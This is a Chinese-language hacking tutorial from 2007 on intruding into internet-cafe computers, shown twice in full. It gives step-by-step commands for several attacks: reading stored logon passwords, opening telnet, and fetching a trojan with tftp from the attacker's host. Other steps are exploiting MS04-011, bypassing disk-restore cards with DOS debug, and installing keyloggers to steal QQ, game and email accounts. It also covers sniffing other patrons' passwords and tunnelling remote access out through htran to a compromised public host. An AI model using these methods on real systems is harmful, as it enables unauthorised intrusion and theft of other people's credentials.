網(wǎng)吧入侵之攻無(wú)不克!
更新時(shí)間:2007年01月16日 00:00:00 作者:
作者:hacker.a… 文章來(lái)源:hacker.ab8.cn
經(jīng)??磝檔案,發(fā)現(xiàn)關(guān)于破解pubwin和萬(wàn)象的文章比較多,今天我決定寫(xiě)點(diǎn)網(wǎng)吧入侵方面的文章,希望對(duì)一些小菜有所幫助.
一. 網(wǎng)吧入侵
入侵的方法很多,但對(duì)網(wǎng)吧入侵最常用的方法是什么呢?首先,自動(dòng)登陸?,F(xiàn)在網(wǎng)吧一般都是win2000或者windows xp的機(jī)器,網(wǎng)管一般都把機(jī)子設(shè)置為自動(dòng)登陸!這樣我們開(kāi)機(jī)進(jìn)入系統(tǒng)的時(shí)候登陸窗口一閃而過(guò)!著時(shí)候如果我們findfass.exe試圖把登陸賬號(hào)密碼找出來(lái)是不會(huì)成功的!因?yàn)橘~號(hào)密碼根本不在內(nèi)存中,而findfass.exe通過(guò)winlogon的PID號(hào)和正確的域名中,在內(nèi)存尋找好段加了密的內(nèi)存塊(保存著加密過(guò)的登陸密碼),然后對(duì)它進(jìn)行解密,這樣就能得到明文的密碼。實(shí)際上自動(dòng)登陸的賬號(hào)密碼都在注冊(cè)表中。我們打開(kāi)注冊(cè)表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\這個(gè)目錄下,AutoAdminLogon這一項(xiàng)的鍵值為1,表示自動(dòng)登陸。為1的時(shí)候,打開(kāi)控制面板的用戶和密碼,會(huì)發(fā)現(xiàn)需要密碼前面的鉤已經(jīng)去掉了。DefaultUserName對(duì)應(yīng)的鍵值就是登陸用戶名,DefaultPassword對(duì)應(yīng)的鍵值就是登陸密碼。實(shí)際上海洋頂端木馬2006就有著一功能,原理是一樣的,不過(guò)因?yàn)闄?quán)限的問(wèn)題,不一定能讀出來(lái)。這樣,密碼賬號(hào)我們都找出來(lái)了。而且你要知道,一個(gè)網(wǎng)吧的自動(dòng)登陸密碼賬號(hào)一般都是一樣的,而且網(wǎng)管為了方便網(wǎng)蟲(chóng)上網(wǎng)一般把他們?cè)O(shè)置在管理員組,至少user組。知道了密碼賬號(hào)還愁入侵不了么?網(wǎng)吧機(jī)子的server服務(wù)一般是禁用的,那我們就不能用ipc入侵了。opentelnet.exe我們也用不了,因?yàn)橹鴤€(gè)也依賴ipc連接,dameware遠(yuǎn)程控制也不行,道理一樣。我們可以用recton著個(gè)小巧實(shí)用的工具來(lái)開(kāi)telnet,這個(gè)工具在win2000下面特別好使。
如圖1。
開(kāi)了telnet后,我們telnet上去,先在本機(jī)打開(kāi)tftpd32.exe,再telnet下面telnet -i myip get 3721.exe c:\3721.exe,這樣就把我們的木馬3721.exe比如radmin傳過(guò)去了。
再在telnet下面直接運(yùn)行3721.exe就ok了。
另一個(gè)方法就是ms04011漏洞,別以為著個(gè)漏洞已經(jīng)過(guò)時(shí)了,在網(wǎng)吧這個(gè)漏洞還是相當(dāng)普遍的,許多網(wǎng)吧的網(wǎng)管只會(huì)裝游戲,重裝系統(tǒng),不重視著寫(xiě)漏洞,懶得打補(bǔ)丁!我們用DSScan掃描192.168.0.1-192.168.0.255,一般會(huì)你會(huì)很驚喜的。我們到用ms04011溢出工具溢出,一下子就得到了系統(tǒng)權(quán)限。
如圖3.
還有很多入侵方法,你可以把xscan搬出來(lái)掃描一下。很多菜鳥(niǎo)喜歡用啊D工具包來(lái)掃網(wǎng)吧的空口令,實(shí)際上這個(gè)工具掃用戶賬號(hào)密碼很弱,以前我試過(guò),我用上面第一種方法發(fā)現(xiàn)網(wǎng)吧都有一個(gè)密碼為空的管理員賬號(hào),用啊D工具包只掃出幾臺(tái)機(jī)子有這個(gè)賬號(hào)。我經(jīng)常用我的最愛(ài)
閃電狐——火狐端口掃描器來(lái)掃一下網(wǎng)吧主機(jī),第一服務(wù)器等。著個(gè)掃描器速度很快,掃1到10000端口也要不了幾分鐘。如果發(fā)現(xiàn)服務(wù)器開(kāi)80斷口,自然是看是不是架設(shè)了網(wǎng)站。再看網(wǎng)站十分有漏洞,想辦法傳個(gè)asp木馬上去提升權(quán)限。如果發(fā)現(xiàn)電影服務(wù)器裝了serv_u,而且你有了一個(gè)賬號(hào),可以嘗試一下serv_u的溢出。
二.網(wǎng)吧牧馬
在網(wǎng)吧安裝木馬最重要的是把它的還原破了,現(xiàn)在網(wǎng)吧的還原系統(tǒng)一般有3種,即還原卡,還原精靈,冰點(diǎn)還原精靈。硬盤還原卡其實(shí)所謂硬盤保護(hù)卡就是在ROM中寫(xiě)了一段HOOK INT 13的程序,屏蔽了
一些功能調(diào)用如AH=3,5等,在中斷向量表中INT 13的SEG,OFFSET
描述為[13h*4+2],[13h*4],將此中的程序先保存后,再替換為自己的代碼,
當(dāng)你AH=2的時(shí),它便會(huì)call原始INT 13地址來(lái)完成(商周)作.
只要找到原始INT 13入口便可以為所欲為.
具體過(guò)程如下:
開(kāi)機(jī)過(guò)程按住F8鍵,進(jìn)入純dos環(huán)境, 注";"后為注釋.
出現(xiàn)提示符c:,
鍵入c:\debug,
- a100
- xor ax,ax
- int 13
- int3
; 尋找原始的int 13入口.
然后輸入t回車,不斷的重復(fù),直到顯示的地址形如 F000:xxxx
,后面的指令為:mov dl,80 (練練眼力-。按q退出.
記下這一地址, 在(0:13H*4)=0:4cH 處填入這個(gè)地址。
例如俺的得到的地址是F000:9A95
再次運(yùn)行debug ,鍵入:
-e 0:4c 95 9A 00 F0 e的作用將數(shù)據(jù)表"95 9A 00 f0",寫(xiě)入地址0:4c開(kāi)始的字節(jié)中.
-q
注: 填的時(shí)候要仔細(xì),填錯(cuò)的話會(huì)死機(jī)。ok,破解完成.
這時(shí)在提示符c:\鍵入
c:\win
進(jìn)入windows系統(tǒng)即可,那么這次你在windows系統(tǒng)中的一切(商周)作,隨著下一次
的啟動(dòng)都會(huì)被還原卡存儲(chǔ)起來(lái)。
這種辦法大家都知道,不過(guò)操作起來(lái)也有點(diǎn)危險(xiǎn),弄不好啟動(dòng)不了。而且win2000沒(méi)有dos環(huán)境,到底性不行呢?呵呵,我還沒(méi)有
做這個(gè)危險(xiǎn)的嘗試。不過(guò)望上有很多關(guān)于破解還原卡的工具可以下載,到底什么工具最好使,大家自己測(cè)試。
至于還原卡,網(wǎng)上有密碼讀取器,不過(guò)著工具只能在win98下面使用。在win2k下面我們可以用winhex來(lái)破解,次方法很奏效,
應(yīng)該是最好的辦法。先隨便輸個(gè)錯(cuò)誤的密碼,彈出錯(cuò)誤窗口后不動(dòng),用winhex查找主要內(nèi)存,找到還原精靈,再搜索我們開(kāi)始
輸?shù)腻e(cuò)誤密碼。在錯(cuò)誤密碼的旁邊應(yīng)該就有正確的密碼。我們輸入正確的密碼轉(zhuǎn)存就行了。這里很簡(jiǎn)單,就不截圖了!
至于冰點(diǎn)還原,好像還沒(méi)有破解辦法,這個(gè)的確很厲害。不過(guò)他有個(gè)選項(xiàng),就是重啟多少次后不還原,沒(méi)事你可以多重啟
試一下,別把機(jī)子整壞了就行。
破了還原后就裝木馬了。我們最好裝鍵盤記錄或密碼截獲木馬,盜qq,游戲賬號(hào),郵箱賬號(hào)等等。比如密碼結(jié)巴等工具,也可以
把瀏覽器默認(rèn)主頁(yè)設(shè)置為你的網(wǎng)頁(yè)木馬。如果網(wǎng)吧的默認(rèn)主頁(yè)都是一樣,而你有能力入侵了那個(gè)網(wǎng)站,在默認(rèn)主頁(yè)上掛馬那更好!
三.網(wǎng)吧嗅探。
如果你想知道網(wǎng)吧某個(gè)mm的qq號(hào),那你就用QQSniffer,Ver2005build5.5。也可以用xniffer,用于嗅探域網(wǎng)中或本機(jī)的pop.smtp.ftp等明文傳輸?shù)膖cp/ip協(xié)議密碼。格式是 xsiff.exe -pass -hide -log pass.log xsiff.exe -tcp -udp -asc -addr 192.168.1.1。如果你不喜歡著個(gè),還有個(gè)密碼監(jiān)聽(tīng)器,密碼監(jiān)聽(tīng)器用于監(jiān)聽(tīng)網(wǎng)頁(yè)的密碼,包括網(wǎng)頁(yè)上的郵箱、論壇、聊天室等等。只需在一臺(tái)電腦上運(yùn)行,就可以監(jiān)聽(tīng)局域網(wǎng)內(nèi)任意一臺(tái)電腦登錄的賬號(hào)和密碼,并將密碼顯示、保存,或發(fā)送到用戶指定的郵箱。我就經(jīng)常有密碼監(jiān)聽(tīng)器2.4破解版在網(wǎng)吧監(jiān)聽(tīng)別人
密碼!當(dāng)然網(wǎng)吧最適合dns欺騙!
如圖3。
四.端口轉(zhuǎn)發(fā)。
為了能隨時(shí)隨地控制網(wǎng)吧機(jī)器,在家也可以!我們最好來(lái)個(gè)端口轉(zhuǎn)發(fā)。首先我們可以用fport.exe(這個(gè)工具在angelshell1.0包里面有),格式為fport 但是使用他可以不必安裝后門,只需要普通的權(quán)限即可執(zhí)行。網(wǎng)吧服務(wù)器一般是win2000server版的,我們趁管理員不注意,給他開(kāi)3389。如果他的ip為192.168.0.1,我們就在他的命令行下執(zhí)行fport.exe 3389 myip 9999,這里的myip可以是我們的一只有公網(wǎng)ip的肉雞。我們?cè)僭诠W(wǎng)ip的肉雞上運(yùn)行FportClient.exe著個(gè)是客戶端。著樣我們登陸公網(wǎng)ip的肉雞的9999端口就進(jìn)了網(wǎng)吧主機(jī)。在上面看第電影趕什么都行,不被發(fā)現(xiàn)就行了,我們動(dòng)作輕點(diǎn)就行了。我們也可以給網(wǎng)吧主機(jī)裝代理。就用htran2.4,SocksCap。在網(wǎng)吧主機(jī)命令行下上執(zhí)行htran.exe -install (安裝Socks5服務(wù)),htran.exe -start (啟動(dòng)Socks5服務(wù)),再執(zhí)行"htran.exe -s -connect 共網(wǎng)肉雞ip 3389。在自己的共網(wǎng)肉雞上執(zhí)行htran.exe -s -listen 3389 5200(監(jiān)聽(tīng)端口).現(xiàn)在用SocksCap連接 218.3.1.1 的5200端口,就等于進(jìn)入了網(wǎng)吧主機(jī)。我們也可以
用vidc來(lái)映射端口,這個(gè)和fport差不多就不多說(shuō)了。
到這里本文要結(jié)束了,其實(shí)也沒(méi)有什么高深的技術(shù),高手見(jiàn)笑了。其實(shí)入侵的時(shí)候會(huì)碰到各種各樣的問(wèn)題,能否解決這這些問(wèn)題。是高手和菜鳥(niǎo)的本質(zhì)區(qū)別!希望喜歡交流技術(shù)的朋友和我聯(lián)系,我的qq是:156544632。我的站
轉(zhuǎn)
經(jīng)??磝檔案,發(fā)現(xiàn)關(guān)于破解pubwin和萬(wàn)象的文章比較多,今天我決定寫(xiě)點(diǎn)網(wǎng)吧入侵方面的文章,希望對(duì)一些小菜有所幫助.
一. 網(wǎng)吧入侵
入侵的方法很多,但對(duì)網(wǎng)吧入侵最常用的方法是什么呢?首先,自動(dòng)登陸?,F(xiàn)在網(wǎng)吧一般都是win2000或者windows xp的機(jī)器,網(wǎng)管一般都把機(jī)子設(shè)置為自動(dòng)登陸!這樣我們開(kāi)機(jī)進(jìn)入系統(tǒng)的時(shí)候登陸窗口一閃而過(guò)!著時(shí)候如果我們findfass.exe試圖把登陸賬號(hào)密碼找出來(lái)是不會(huì)成功的!因?yàn)橘~號(hào)密碼根本不在內(nèi)存中,而findfass.exe通過(guò)winlogon的PID號(hào)和正確的域名中,在內(nèi)存尋找好段加了密的內(nèi)存塊(保存著加密過(guò)的登陸密碼),然后對(duì)它進(jìn)行解密,這樣就能得到明文的密碼。實(shí)際上自動(dòng)登陸的賬號(hào)密碼都在注冊(cè)表中。我們打開(kāi)注冊(cè)表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\這個(gè)目錄下,AutoAdminLogon這一項(xiàng)的鍵值為1,表示自動(dòng)登陸。為1的時(shí)候,打開(kāi)控制面板的用戶和密碼,會(huì)發(fā)現(xiàn)需要密碼前面的鉤已經(jīng)去掉了。DefaultUserName對(duì)應(yīng)的鍵值就是登陸用戶名,DefaultPassword對(duì)應(yīng)的鍵值就是登陸密碼。實(shí)際上海洋頂端木馬2006就有著一功能,原理是一樣的,不過(guò)因?yàn)闄?quán)限的問(wèn)題,不一定能讀出來(lái)。這樣,密碼賬號(hào)我們都找出來(lái)了。而且你要知道,一個(gè)網(wǎng)吧的自動(dòng)登陸密碼賬號(hào)一般都是一樣的,而且網(wǎng)管為了方便網(wǎng)蟲(chóng)上網(wǎng)一般把他們?cè)O(shè)置在管理員組,至少user組。知道了密碼賬號(hào)還愁入侵不了么?網(wǎng)吧機(jī)子的server服務(wù)一般是禁用的,那我們就不能用ipc入侵了。opentelnet.exe我們也用不了,因?yàn)橹鴤€(gè)也依賴ipc連接,dameware遠(yuǎn)程控制也不行,道理一樣。我們可以用recton著個(gè)小巧實(shí)用的工具來(lái)開(kāi)telnet,這個(gè)工具在win2000下面特別好使。
如圖1。
開(kāi)了telnet后,我們telnet上去,先在本機(jī)打開(kāi)tftpd32.exe,再telnet下面telnet -i myip get 3721.exe c:\3721.exe,這樣就把我們的木馬3721.exe比如radmin傳過(guò)去了。
再在telnet下面直接運(yùn)行3721.exe就ok了。
另一個(gè)方法就是ms04011漏洞,別以為著個(gè)漏洞已經(jīng)過(guò)時(shí)了,在網(wǎng)吧這個(gè)漏洞還是相當(dāng)普遍的,許多網(wǎng)吧的網(wǎng)管只會(huì)裝游戲,重裝系統(tǒng),不重視著寫(xiě)漏洞,懶得打補(bǔ)丁!我們用DSScan掃描192.168.0.1-192.168.0.255,一般會(huì)你會(huì)很驚喜的。我們到用ms04011溢出工具溢出,一下子就得到了系統(tǒng)權(quán)限。
如圖3.
還有很多入侵方法,你可以把xscan搬出來(lái)掃描一下。很多菜鳥(niǎo)喜歡用啊D工具包來(lái)掃網(wǎng)吧的空口令,實(shí)際上這個(gè)工具掃用戶賬號(hào)密碼很弱,以前我試過(guò),我用上面第一種方法發(fā)現(xiàn)網(wǎng)吧都有一個(gè)密碼為空的管理員賬號(hào),用啊D工具包只掃出幾臺(tái)機(jī)子有這個(gè)賬號(hào)。我經(jīng)常用我的最愛(ài)
閃電狐——火狐端口掃描器來(lái)掃一下網(wǎng)吧主機(jī),第一服務(wù)器等。著個(gè)掃描器速度很快,掃1到10000端口也要不了幾分鐘。如果發(fā)現(xiàn)服務(wù)器開(kāi)80斷口,自然是看是不是架設(shè)了網(wǎng)站。再看網(wǎng)站十分有漏洞,想辦法傳個(gè)asp木馬上去提升權(quán)限。如果發(fā)現(xiàn)電影服務(wù)器裝了serv_u,而且你有了一個(gè)賬號(hào),可以嘗試一下serv_u的溢出。
二.網(wǎng)吧牧馬
在網(wǎng)吧安裝木馬最重要的是把它的還原破了,現(xiàn)在網(wǎng)吧的還原系統(tǒng)一般有3種,即還原卡,還原精靈,冰點(diǎn)還原精靈。硬盤還原卡其實(shí)所謂硬盤保護(hù)卡就是在ROM中寫(xiě)了一段HOOK INT 13的程序,屏蔽了
一些功能調(diào)用如AH=3,5等,在中斷向量表中INT 13的SEG,OFFSET
描述為[13h*4+2],[13h*4],將此中的程序先保存后,再替換為自己的代碼,
當(dāng)你AH=2的時(shí),它便會(huì)call原始INT 13地址來(lái)完成(商周)作.
只要找到原始INT 13入口便可以為所欲為.
具體過(guò)程如下:
開(kāi)機(jī)過(guò)程按住F8鍵,進(jìn)入純dos環(huán)境, 注";"后為注釋.
出現(xiàn)提示符c:,
鍵入c:\debug,
- a100
- xor ax,ax
- int 13
- int3
; 尋找原始的int 13入口.
然后輸入t回車,不斷的重復(fù),直到顯示的地址形如 F000:xxxx
,后面的指令為:mov dl,80 (練練眼力-。按q退出.
記下這一地址, 在(0:13H*4)=0:4cH 處填入這個(gè)地址。
例如俺的得到的地址是F000:9A95
再次運(yùn)行debug ,鍵入:
-e 0:4c 95 9A 00 F0 e的作用將數(shù)據(jù)表"95 9A 00 f0",寫(xiě)入地址0:4c開(kāi)始的字節(jié)中.
-q
注: 填的時(shí)候要仔細(xì),填錯(cuò)的話會(huì)死機(jī)。ok,破解完成.
這時(shí)在提示符c:\鍵入
c:\win
進(jìn)入windows系統(tǒng)即可,那么這次你在windows系統(tǒng)中的一切(商周)作,隨著下一次
的啟動(dòng)都會(huì)被還原卡存儲(chǔ)起來(lái)。
這種辦法大家都知道,不過(guò)操作起來(lái)也有點(diǎn)危險(xiǎn),弄不好啟動(dòng)不了。而且win2000沒(méi)有dos環(huán)境,到底性不行呢?呵呵,我還沒(méi)有
做這個(gè)危險(xiǎn)的嘗試。不過(guò)望上有很多關(guān)于破解還原卡的工具可以下載,到底什么工具最好使,大家自己測(cè)試。
至于還原卡,網(wǎng)上有密碼讀取器,不過(guò)著工具只能在win98下面使用。在win2k下面我們可以用winhex來(lái)破解,次方法很奏效,
應(yīng)該是最好的辦法。先隨便輸個(gè)錯(cuò)誤的密碼,彈出錯(cuò)誤窗口后不動(dòng),用winhex查找主要內(nèi)存,找到還原精靈,再搜索我們開(kāi)始
輸?shù)腻e(cuò)誤密碼。在錯(cuò)誤密碼的旁邊應(yīng)該就有正確的密碼。我們輸入正確的密碼轉(zhuǎn)存就行了。這里很簡(jiǎn)單,就不截圖了!
至于冰點(diǎn)還原,好像還沒(méi)有破解辦法,這個(gè)的確很厲害。不過(guò)他有個(gè)選項(xiàng),就是重啟多少次后不還原,沒(méi)事你可以多重啟
試一下,別把機(jī)子整壞了就行。
破了還原后就裝木馬了。我們最好裝鍵盤記錄或密碼截獲木馬,盜qq,游戲賬號(hào),郵箱賬號(hào)等等。比如密碼結(jié)巴等工具,也可以
把瀏覽器默認(rèn)主頁(yè)設(shè)置為你的網(wǎng)頁(yè)木馬。如果網(wǎng)吧的默認(rèn)主頁(yè)都是一樣,而你有能力入侵了那個(gè)網(wǎng)站,在默認(rèn)主頁(yè)上掛馬那更好!
三.網(wǎng)吧嗅探。
如果你想知道網(wǎng)吧某個(gè)mm的qq號(hào),那你就用QQSniffer,Ver2005build5.5。也可以用xniffer,用于嗅探域網(wǎng)中或本機(jī)的pop.smtp.ftp等明文傳輸?shù)膖cp/ip協(xié)議密碼。格式是 xsiff.exe -pass -hide -log pass.log xsiff.exe -tcp -udp -asc -addr 192.168.1.1。如果你不喜歡著個(gè),還有個(gè)密碼監(jiān)聽(tīng)器,密碼監(jiān)聽(tīng)器用于監(jiān)聽(tīng)網(wǎng)頁(yè)的密碼,包括網(wǎng)頁(yè)上的郵箱、論壇、聊天室等等。只需在一臺(tái)電腦上運(yùn)行,就可以監(jiān)聽(tīng)局域網(wǎng)內(nèi)任意一臺(tái)電腦登錄的賬號(hào)和密碼,并將密碼顯示、保存,或發(fā)送到用戶指定的郵箱。我就經(jīng)常有密碼監(jiān)聽(tīng)器2.4破解版在網(wǎng)吧監(jiān)聽(tīng)別人
密碼!當(dāng)然網(wǎng)吧最適合dns欺騙!
如圖3。
四.端口轉(zhuǎn)發(fā)。
為了能隨時(shí)隨地控制網(wǎng)吧機(jī)器,在家也可以!我們最好來(lái)個(gè)端口轉(zhuǎn)發(fā)。首先我們可以用fport.exe(這個(gè)工具在angelshell1.0包里面有),格式為fport 但是使用他可以不必安裝后門,只需要普通的權(quán)限即可執(zhí)行。網(wǎng)吧服務(wù)器一般是win2000server版的,我們趁管理員不注意,給他開(kāi)3389。如果他的ip為192.168.0.1,我們就在他的命令行下執(zhí)行fport.exe 3389 myip 9999,這里的myip可以是我們的一只有公網(wǎng)ip的肉雞。我們?cè)僭诠W(wǎng)ip的肉雞上運(yùn)行FportClient.exe著個(gè)是客戶端。著樣我們登陸公網(wǎng)ip的肉雞的9999端口就進(jìn)了網(wǎng)吧主機(jī)。在上面看第電影趕什么都行,不被發(fā)現(xiàn)就行了,我們動(dòng)作輕點(diǎn)就行了。我們也可以給網(wǎng)吧主機(jī)裝代理。就用htran2.4,SocksCap。在網(wǎng)吧主機(jī)命令行下上執(zhí)行htran.exe -install (安裝Socks5服務(wù)),htran.exe -start (啟動(dòng)Socks5服務(wù)),再執(zhí)行"htran.exe -s -connect 共網(wǎng)肉雞ip 3389。在自己的共網(wǎng)肉雞上執(zhí)行htran.exe -s -listen 3389 5200(監(jiān)聽(tīng)端口).現(xiàn)在用SocksCap連接 218.3.1.1 的5200端口,就等于進(jìn)入了網(wǎng)吧主機(jī)。我們也可以
用vidc來(lái)映射端口,這個(gè)和fport差不多就不多說(shuō)了。
到這里本文要結(jié)束了,其實(shí)也沒(méi)有什么高深的技術(shù),高手見(jiàn)笑了。其實(shí)入侵的時(shí)候會(huì)碰到各種各樣的問(wèn)題,能否解決這這些問(wèn)題。是高手和菜鳥(niǎo)的本質(zhì)區(qū)別!希望喜歡交流技術(shù)的朋友和我聯(lián)系,我的qq是:156544632。我的站
轉(zhuǎn)
相關(guān)文章
緩沖區(qū)溢出:十年來(lái)攻擊和防衛(wèi)的弱點(diǎn)
緩沖區(qū)溢出:十年來(lái)攻擊和防衛(wèi)的弱點(diǎn)...2007-01-01淺析國(guó)內(nèi)某網(wǎng)絡(luò)游戲的安全現(xiàn)況
淺析國(guó)內(nèi)某網(wǎng)絡(luò)游戲的安全現(xiàn)況2007-01-01關(guān)于9行代碼導(dǎo)致系統(tǒng)崩潰的分析整理
關(guān)于9行代碼導(dǎo)致系統(tǒng)崩潰的分析整理...2007-01-01關(guān)于對(duì)SQL注入80004005 及其它錯(cuò)誤消息分析
關(guān)于對(duì)SQL注入80004005 及其它錯(cuò)誤消息分析...2007-01-01db_owner權(quán)限得到webshell我的兩點(diǎn)改進(jìn)
db_owner權(quán)限得到webshell我的兩點(diǎn)改進(jìn)...2007-01-01PHP博客程序C-blog2.0漏洞測(cè)試大揭密(圖)
PHP博客程序C-blog2.0漏洞測(cè)試大揭密(圖)...2007-01-01誘人視頻請(qǐng)君入甕 解析RealPlayer溢出漏洞
誘人視頻請(qǐng)君入甕 解析RealPlayer溢出漏洞...2007-01-01